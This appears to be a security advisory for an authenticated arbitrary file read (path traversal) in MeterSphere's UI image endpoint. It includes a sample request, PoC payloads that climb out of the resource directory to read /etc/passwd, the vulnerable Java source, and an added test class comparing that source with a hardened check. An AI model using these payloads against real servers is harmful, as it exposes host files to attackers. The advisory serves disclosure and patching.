
Arbitrary File Read Vulnerability

High
fit2-zhao published GHSA-fwc3-5h55-mh2j Mar 9, 2023

Package

maven framework/sdk-parent/sdk/src/main/java/io/metersphere/commons/utils/FileUtils.java (Maven)

Affected versions

<=v2.6.2

Patched versions

v2.7.1

Description

Summary

The system has an arbitrary file read vulnerability: an authenticated user can read files outside the intended resource directory, for example the host's /etc/passwd.
This vulnerability affects versions v1.20.19-lts (latest) and below (v1.20.18-lts-b1 is also affected). Installation method reference: https://metersphere.io/docs/v2.x/installation/online_installation/

Details

First create a resource file through the UI. For convenience, you can also create a test file directly in the report directory shown in the screenshot.
The file layout is as follows (screenshot omitted):
the directory 1 corresponds to the reportId parameter of the interface, 1.txt inside it corresponds to the fileName parameter, and 2.txt, which sits one level above directory 1, is the first file read by the PoC.
The interface is:
GET /resource/ui/get?fileName=2&reportId=2 HTTP/1.1
Cookie: SESSION=ZjllMjRjMWEtMmRhNC00MGU0LTlkMjMtOGY1MDllOWI1ZWE3
X-Schema: http
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:108.0) Gecko/20100101 Firefox/108.0
Connection: keep-alive
Referer: http://192.168.11.77:8081/swagger-ui/index.html?configUrl=/v3/api-docs/swagger-config
Host: 192.168.11.77:8081
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
CSRF-TOKEN: rcK0OGd0O5Df14tmgilfoCSsiJaS9OiQugGZWf19A/yCU2SXvLnPTPZNwiG9AUj0RWtFWbWCencuKk/L+90++A==

PoC

Read 2.txt
Payload:
/resource/ui/get?fileName=2.txt&reportId=1/..
Effect: (screenshot omitted)

Read the passwd file
Payload:
/resource/ui/get?fileName=passwd&reportId=1/../../../../../../../../etc/
Effect: (screenshot omitted)

Impact

Source code analysis
The read interface is ResourceController.java at framework/sdk-parent/sdk/src/main/java/io/metersphere/controller/ResourceController.java.
The code is:
    // Both query parameters are passed straight through to the service.
    @GetMapping(value = "/ui/get")
    public ResponseEntity getUiFile(@RequestParam("fileName") String fileName, @RequestParam("reportId") String reportId) {
        return resourceService.getUiResultImage(fileName, reportId);
    }
Tracing resourceService's file-reading method getUiResultImage(fileName, reportId):
    public ResponseEntity getUiResultImage(String name, String reportId) {
        // Only `name` is checked for a path separator.
        if (name.contains("/")) {
            MSException.throwException(Translator.get("invalid_parameter"));
        }
        // `reportId` is concatenated into the path unchecked.
        return getImage(FileUtils.UI_IMAGE_DIR + "/" + reportId + "/" + name);
    }

So name is filtered for "/", but reportId is not. An attacker therefore never needs a "/" in name: the traversal goes entirely into reportId, and name only has to be the final file name. Because ".." segments that climb past the filesystem root are simply ignored, the payload just needs at least as many ".." as UI_IMAGE_DIR is deep, which is why the PoC can use a generous count without knowing the exact install path.
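To make the gap concrete, here is an added example (my own code, not MeterSphere's and not the upstream patch) that models the path construction in getUiResultImage beside a hardened variant and runs both over the advisory's PoC payloads. The base directory standing in for FileUtils.UI_IMAGE_DIR is a constructed temp directory, and the class and method names are assumptions for illustration.

```java
import java.io.IOException;
import java.nio.file.Files;
import java.nio.file.Path;
import java.nio.file.Paths;

// Added example, not MeterSphere code. It models the path construction in
// ResourceService.getUiResultImage (only `name` is filtered, then string
// concatenation) next to a hardened variant, and runs both on the advisory's
// PoC payloads. The base directory stands in for FileUtils.UI_IMAGE_DIR and is
// a constructed temp directory here.
public class UiImagePathCheck {

    // Mirrors the vulnerable logic: `name` may not contain "/", `reportId` is not checked.
    static Path vulnerableResolve(Path uiImageDir, String name, String reportId) {
        if (name.contains("/")) {
            throw new IllegalArgumentException("invalid_parameter");
        }
        return Paths.get(uiImageDir + "/" + reportId + "/" + name);
    }

    // Hardened variant (a suggestion added here, not the upstream patch): reject
    // separators in both parameters, resolve against the base directory, collapse
    // ".." with normalize(), and refuse any result that leaves the base.
    static Path hardenedResolve(Path uiImageDir, String name, String reportId) {
        for (String p : new String[] {name, reportId}) {
            if (p.isEmpty() || p.contains("/") || p.contains("\\")) {
                throw new IllegalArgumentException("invalid_parameter");
            }
        }
        Path base = uiImageDir.toAbsolutePath().normalize();
        Path target = base.resolve(reportId).resolve(name).normalize();
        if (!target.startsWith(base)) {
            throw new IllegalArgumentException("invalid_parameter");
        }
        return target;
    }

    // Returns true when the computed path lies outside the base directory.
    static boolean escapesBase(Path uiImageDir, Path target) {
        Path base = uiImageDir.toAbsolutePath().normalize();
        return !target.toAbsolutePath().normalize().startsWith(base);
    }

    public static void main(String[] args) throws IOException {
        Path base = Files.createTempDirectory("ui-images"); // constructed stand-in for UI_IMAGE_DIR

        // Payloads from the advisory, as (fileName, reportId) pairs.
        String[][] payloads = {
            {"2.txt", "1"},                                // legitimate request
            {"2.txt", "1/.."},                             // PoC: one level up, reads 2.txt
            {"passwd", "1/../../../../../../../../etc/"},  // PoC: /etc/passwd
            {"passwd", ".."},                              // no "/" in reportId, still climbs
        };

        for (String[] p : payloads) {
            String name = p[0], reportId = p[1];
            Path v = vulnerableResolve(base, name, reportId);
            System.out.printf("vulnerable  fileName=%s reportId=%s -> %s (escapes base: %b)%n",
                    name, reportId, v.normalize(), escapesBase(base, v));
            try {
                Path h = hardenedResolve(base, name, reportId);
                System.out.printf("hardened    fileName=%s reportId=%s -> %s%n", name, reportId, h);
            } catch (IllegalArgumentException e) {
                System.out.printf("hardened    fileName=%s reportId=%s -> rejected (%s)%n",
                        name, reportId, e.getMessage());
            }
        }
        Files.delete(base);
    }
}
```

Compile with javac and run it. The vulnerable variant resolves the /etc/ payload to /etc/passwd on a Unix layout, while the hardened variant rejects every payload that leaves the base, including a bare ".." in reportId that a separator filter alone would let through; that last case is why the normalize-then-startsWith check is needed in addition to the character filter.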

Severity

High

CVE ID

CVE-2023-25814

Weaknesses

No CWEs

Credits